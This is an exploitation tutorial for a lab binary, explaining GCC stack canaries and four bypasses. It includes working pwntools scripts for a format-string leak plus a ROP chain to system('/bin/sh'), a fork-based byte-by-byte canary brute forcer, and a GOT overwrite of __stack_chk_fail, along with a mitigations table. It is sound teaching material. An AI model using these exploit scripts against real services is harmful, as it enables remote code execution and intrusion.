GCC’s stack canary (the “stack smashing protector”, SSP) places a random word between local variables and the saved return address. The function epilogue re-reads that word and aborts via __stack_chk_fail if it changed. A linear stack overflow that overwrites the saved RIP must also overwrite the canary — and unless you know its value, the program dies before ret ever runs.
This tutorial covers four practical bypasses: leaking the canary with a format string, brute-forcing it byte by byte across fork(), redirecting __stack_chk_fail in the GOT, and pivoting around the check entirely. It also covers what does not work, because students burn a lot of time on those paths.
Note
Lab Binary This tutorial uses the
targetbinary from the Linux Exploitation Lab (14-stack-canaries/). See the setup guide for build instructions.
How GCC Stack Canaries Actually Work
The common flavours
GCC offers several stack protector modes. These are the common ones you will see in exploitation labs and distro builds:
| Flag | Functions instrumented |
|---|---|
-fstack-protector | Functions with a char buffer larger than 8 bytes |
-fstack-protector-strong | Functions with any local array, alloca, or address-taken locals |
-fstack-protector-all | Every function frame, regardless of contents |
-fstack-protector-explicit | Only functions annotated with stack_protect |
Most Linux distros build user binaries with -strong. Glibc, the kernel, and security-sensitive libraries use -all for hot paths.
Where the canary lives
On x86_64, the canary is loaded from the Thread Local Storage block at offset 0x28:
mov rax, QWORD PTR fs:0x28On i386, it lives at gs:0x14. The TLS block itself is set up by glibc. Modern glibc initializes the canary from the kernel-provided AT_RANDOM auxiliary vector via _dl_setup_stack_chk_guard(), then stores the result in TLS.
The all-zero low byte
The least significant byte of the canary is always \x00 on glibc. This is by design, not by accident: it terminates C strings, so a strcpy() or gets() overflow into the canary leaves the byte that gets compared back as zero — which means strcpy cannot trivially copy a forged canary in. Do not confuse this with weakness: the byte is a deliberate barrier, not a leaked secret. The remaining 7 bytes are random.
Prologue and epilogue
A function with a vulnerable buffer compiled with -fstack-protector-strong looks like this:
; --- prologue ---
push rbp
mov rbp, rsp
sub rsp, 0x130
mov rax, QWORD PTR fs:0x28 ; load canary from TLS
mov QWORD PTR [rbp-0x8], rax ; store on stack just below saved RBP
xor eax, eax
; ... function body, gets(buf), etc ...
; --- epilogue ---
mov rax, QWORD PTR [rbp-0x8] ; reload from stack
sub rax, QWORD PTR fs:0x28 ; compare against TLS copy
jne .stack_chk_failed ; mismatch -> die
leave
ret
.stack_chk_failed:
call __stack_chk_fail@plt__stack_chk_fail calls __fortify_fail, which prints a “stack smashing detected” diagnostic through glibc’s fatal-message path and then aborts. The diagnostic does not include the canary value. Whether a remote attacker sees the text depends on how the service wired file descriptor 2; in many inetd-style services stderr is not connected to the attacker’s socket, so the observable signal is just a dropped connection.
Stack layout
High addr
+---------------------------+
| saved RIP | <- ret target
+---------------------------+
| saved RBP |
+---------------------------+
| canary (8 bytes, low=00) | <- compared in epilogue
+---------------------------+
| local variables |
| char buf[256] | <- overflow source
+---------------------------+
Low addr (RSP)A linear overflow walks low-to-high: buffer -> canary -> saved RBP -> saved RIP. To reach RIP you must write through the canary. If your write doesn’t preserve the canary’s exact value, you abort.
Thread and fork behavior
On mainstream glibc, new threads receive a copy of the creating thread’s stack guard in their TLS. That means a leak from one thread is generally useful elsewhere in the same process unless the program or runtime explicitly rekeys guards. Forking servers are even simpler: the child inherits the parent’s address space, including the TLS block holding the canary.
Initial Analysis
checksec ./targetRELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIEDisassemble main to confirm a real GCC canary (not a hand-rolled integrity word):
objdump -d -M intel ./target | grep -A2 -B2 'fs:0x28' 401234: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
40123b: 00 00
40123d: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax
...
4012a5: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8]
4012a9: 64 48 33 04 25 28 00 xor rax,QWORD PTR fs:0x28
4012b0: 00 00
4012b2: 74 05 je 4012b9 <main+0x85>
4012b4: e8 87 fd ff ff call 401040 <__stack_chk_fail@plt>The xor form is what newer GCC emits; older versions used sub plus jne. Same effect.
Bypass 1: Leak via Format String
If you have a format-string bug before the overflow, leak the canary, then splice it back into the overflow payload at the right offset.
See Format String Vulnerabilities on x86 for the mechanics. Quick recap: %N$p reads the Nth stack argument as a pointer and prints it.
Finding the canary’s format-string offset
./target
> %1$p %2$p %3$p ... %30$p
0x7ffe1234abcd 0x4011a0 ... 0xb4d3f8c1e2a70000Pick the value with a zero low byte and the high entropy of a typical TLS guard — it stands out. In a default 64-bit frame compiled at -O0 with one local char buf[256], the canary typically lands at %17$p (vararg slot) or somewhere around %23$p once buffers and saved registers are accounted for. Verify in GDB:
gdb-peda$ b *main+EPILOGUE_OFFSET
gdb-peda$ run
gdb-peda$ x/gx $rbp-0x8
0x7fffffffe418: 0xb4d3f8c1e2a70000Two-shot exploit
If the program loops (read -> print -> read -> print, then eventually return), one request leaks, the next overflows:
from pwn import *
context.arch = 'amd64'
io = remote('target', 5556)
# Stage 1: leak canary
io.sendlineafter(b'> ', b'%23$p')
canary = int(io.recvline().strip(), 16)
log.info(f'canary = {canary:#018x}')
assert canary & 0xff == 0, 'low byte must be zero'
# Stage 2: overflow with canary preserved
buf = b'A' * 264 # buffer fill up to canary
buf += p64(canary) # restore canary
buf += b'B' * 8 # saved RBP (any value)
buf += p64(pop_rdi) + p64(sh_str) # ROP starts here
buf += p64(system_plt)
io.sendlineafter(b'> ', buf)
io.interactive()The 264-byte fill assumes a char buf[256] plus 8 bytes of other locals; adjust to your binary. Use a cyclic pattern to find the exact canary offset if you don’t know it.
Bypass 2: Brute Force Across Forks
When a server uses accept() -> fork() -> handle, every child inherits the parent’s address space, including the TLS block holding the canary. Crash one child and the parent forks another with the same canary. This is the classic socat/inetd/xinetd setup, and it is the canary’s worst case.
Why it works
fork() performs a copy-on-write clone of the parent’s pages. TLS lives in the parent and is copied into the child intact. The child’s fs:0x28 returns the same 8 bytes the parent had. Crashing the child does not perturb the parent’s TLS, and the next fork() produces another child with the same value.
This does not work if:
- The server
exec()s a fresh binary per connection (new process image -> new TLS -> new canary). - The service restarts the whole binary on crash (e.g. systemd restart-on-failure).
- The service uses pre-fork worker pools where workers are recycled via exec.
The bypass requires fork() without exec(). Make sure of this before sinking 1700 requests into nothing.
Byte-by-byte walk
The low byte is \x00. The other 7 bytes are random but fixed across forks. Brute force one byte at a time:
- Set canary[0] =
\x00(known). - For each of canary[1..7]: try values
\x00through\xffuntil the child does not crash. - A wrong byte triggers
__stack_chk_fail->abort()-> connection drops. A right byte means the function returns normally — the connection persists, output appears, whatever the program does after the vulnerable function happens. - After 7 bytes, you have the full canary.
Worst case 256 * 7 = 1792 connections; average case ~896. Trivially fast over localhost or a LAN.
pwntools brute forcer
Assume the vulnerable function reads exactly BUFLEN + 8 bytes and returns. If the canary is correct, a known confirmation byte gets echoed; if not, the connection drops mid-write.
from pwn import *
import socket
HOST, PORT = 'target', 5556
BUFLEN = 264 # buffer size up to canary
def try_prefix(prefix):
"""Send overflow with `prefix` as the start of the canary.
Return True if the child survived past the canary check."""
try:
io = remote(HOST, PORT, timeout=2)
# pad the canary to 8 bytes; the unknown tail can be anything
canary = prefix + b'\x00' * (8 - len(prefix))
payload = b'A' * BUFLEN + canary
# do NOT include any extra bytes -- we only want to overwrite up to
# the canary, not RBP/RIP. The canary check fires at function return,
# before RIP is consumed.
io.send(payload)
# Probe: if the canary matched, the function returned and the program
# sent its normal post-function output. If it mismatched, abort()
# killed the child and recv() returns empty.
data = io.recv(timeout=1)
io.close()
return len(data) > 0
except (EOFError, socket.error):
return False
canary = b'\x00' # low byte is always 0
for byte_idx in range(1, 8):
log.info(f'brute byte {byte_idx}')
for guess in range(256):
candidate = canary + bytes([guess])
if try_prefix(candidate):
canary = candidate
log.success(f'byte {byte_idx} = {guess:#04x} canary so far = {canary.hex()}')
break
else:
log.failure(f'byte {byte_idx}: no value worked -- check your assumptions')
break
log.success(f'full canary: {canary.hex()}')Probe quality matters
The above relies on “did we get any data back” as the oracle. That is brittle. Better oracles:
- Time the response. A surviving child does some work; a crashing child returns near-instantly when
abort()runs. Measure both and pick a threshold. - Look for a specific byte the program prints only on the success path.
- Use a two-stage payload: overflow, then send a second message; only a surviving child reads the second message.
Pick whichever distinguishes survival from crash most reliably for your target.
Caveat: where the overflow stops
For brute force, only overwrite up to and including the canary. Do not overwrite the saved RBP or RIP yet. The canary is checked before ret, so the saved RIP is irrelevant during the brute-force phase, and corrupting RBP can cause leave to fault before the check, giving you a false negative (process dies but not via the canary path).
Once you have the full canary, do a final exploit shot that includes the canary plus a full ROP chain.
Bypass 3: Overwriting __stack_chk_fail in the GOT
If you have a write primitive independent of the canary path — a format-string %hn write, an arbitrary-write heap bug, an out-of-bounds array write — you can redirect __stack_chk_fail@got.plt to a function of your choice. The canary check still happens, the mismatch is still detected, but the call goes somewhere harmless or attacker-controlled.
Useful targets to redirect to:
exit— silently terminate without abort/SIGABRT and without printing the diagnostic. Useful in info-leak contexts where you’ve already extracted what you need.- A one-gadget in libc (
execve("/bin/sh", 0, 0)style) — if libc is leaked, redirect straight to a one-gadget. The constraints (specific register/stack states) often happen to be satisfied at the canary-check site because the function frame is still intact. - A jump back into the binary’s code — e.g. into a shellcode buffer whose address you control.
Finding the GOT entry
objdump -R ./target | grep stack_chk_fail0000000000404038 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.40x404038 is the GOT slot. With Partial RELRO this slot is writable at runtime; with Full RELRO it is not (see below).
Skeleton: format string overwrite
Assume a format-string primitive that lets you write 2 bytes at a time via %hn:
from pwn import *
context.arch = 'amd64'
io = remote('target', 5556)
stack_chk_got = 0x404038
target_addr = 0x4012e0 # function we want to call instead
# fmtstr_payload writes target_addr at stack_chk_got
# offset 6 = where our format-string buffer begins on the stack (verify!)
payload = fmtstr_payload(6, {stack_chk_got: target_addr})
io.sendline(payload)
# Now trigger the overflow. The canary check WILL detect the mismatch
# and call __stack_chk_fail@plt -- which now resolves to target_addr.
overflow = b'A' * 264
overflow += b'CANARY!!' # garbage, doesn't matter
overflow += b'B' * 8 # saved RBP
overflow += p64(0xdeadbeef) # saved RIP, won't be reached
io.sendline(overflow)
io.interactive()The trick is that the canary check now becomes the trigger for code execution rather than a kill switch. You don’t need to know the canary value at all — you want it to mismatch.
Constraint: lazy resolution path
__stack_chk_fail@plt typically goes through .got.plt (lazy resolution table), not the immutable .got. Partial RELRO leaves .got.plt writable. Full RELRO (-Wl,-z,relro,-z,now) resolves all symbols at load time and remaps .got.plt read-only. With Full RELRO, this whole bypass is dead — writing to 0x404038 will fault.
Check at runtime:
gdb-peda$ vmmap 0x404038
Start End Perm
0x0000000000404000 0x0000000000405000 r--p # Full RELRO: read-only
0x0000000000404000 0x0000000000405000 rw-p # Partial RELRO: writableWhy exit is the cleanest target
If you’ve already exfiltrated what you need (a leaked libc address, a flag, a token) before the overflow, redirecting __stack_chk_fail to exit lets the program terminate without the SSP diagnostic ever firing. No “stack smashing detected” line in the journal, no SIGABRT, no core dump. Stealth bypass.
Bypass 4: Stack Pivot Around the Check
The canary is checked in the function’s epilogue. If you can transfer control somewhere else without traversing that epilogue, the check never runs.
This is rare. Cases where it happens:
- The vulnerable function calls something that itself takes a function pointer from the corrupted stack region (a corrupted vtable, an indirect call through a struct field). You hijack control before the canary check.
- A heap or BSS bug overwrites a saved jump target used elsewhere. You return cleanly from the canary-protected function, then control flow reaches the corrupted pointer later.
- An exception handler / longjmp / SIGSEGV handler is reachable.
siglongjmpjumps to a saved context without unwinding the wayretdoes, skipping the canary check.
Brief mention only. If you have one of these primitives, you usually don’t need to think about the canary at all — just don’t disturb it.
What Doesn’t Work
”I’ll just guess the canary”
7 bytes of randomness = 2^56 possibilities. Without fork() reuse, a fresh canary per process means roughly 72 quadrillion guesses. Not happening.
”I’ll write whatever I want and hope”
Some students send \x00\x00\x00\x00\x00\x00\x00\x00 figuring “the low byte is zero, maybe the rest is too.” It isn’t. The other 7 bytes are random data initialized from AT_RANDOM. The probability of an all-zero canary is 1 in 2^56.
”PIE will protect me”
PIE randomizes the binary’s base address. It does not affect the canary at all — the canary lives in TLS, controlled by glibc, independent of PIE. A format-string leak gives you the canary regardless of whether the binary is PIE.
”The stack canary diagnostic will leak into my socket”
__stack_chk_fail emits a fatal diagnostic and aborts, but the message does not contain the canary value. Whether you see the text over the network depends entirely on how stderr is connected. Many services leave stderr on a terminal, a log, or /dev/null; some challenge harnesses wire it to the socket. Treat the abort as a crash oracle, not an information leak.
”Partial RELRO is the same as Full RELRO”
It isn’t. Partial RELRO marks .got (initial symbols) read-only but leaves .got.plt (lazy-resolved entries) writable. __stack_chk_fail is in .got.plt. Partial RELRO does not block Bypass 3. Always check with checksec or by inspecting page permissions.
Mitigations Summary
| Mitigation | Blocks Bypass 1 (leak) | Blocks Bypass 2 (brute) | Blocks Bypass 3 (GOT) |
|---|---|---|---|
-fstack-protector -> -strong | No | No | No |
| Full RELRO | No | No | Yes |
exec() per connection (no fork) | No | Yes | No |
| No format-string vulnerability | Yes | No | No (if other write exists) |
The combination that actually defeats these bypasses: Full RELRO + no format-string bug + no independent write primitive + fresh process state for each connection. Most production binaries lack at least one of these.
Key Takeaways
- The canary lives in TLS at
fs:0x28on x86_64. The low byte is always\x00by design. fork()withoutexec()reuses the canary, enabling 1792-request byte-by-byte brute force.- A format-string leak ends the protection — read the canary, splice it into your overflow.
- GOT overwrite of
__stack_chk_failturns the kill switch into a jump primitive, but only against Partial RELRO. - The diagnostic does not leak the canary. At most it gives you a crash/survival signal.
- PIE does not interact with the canary. A leak is a leak whether or not the binary is position-independent.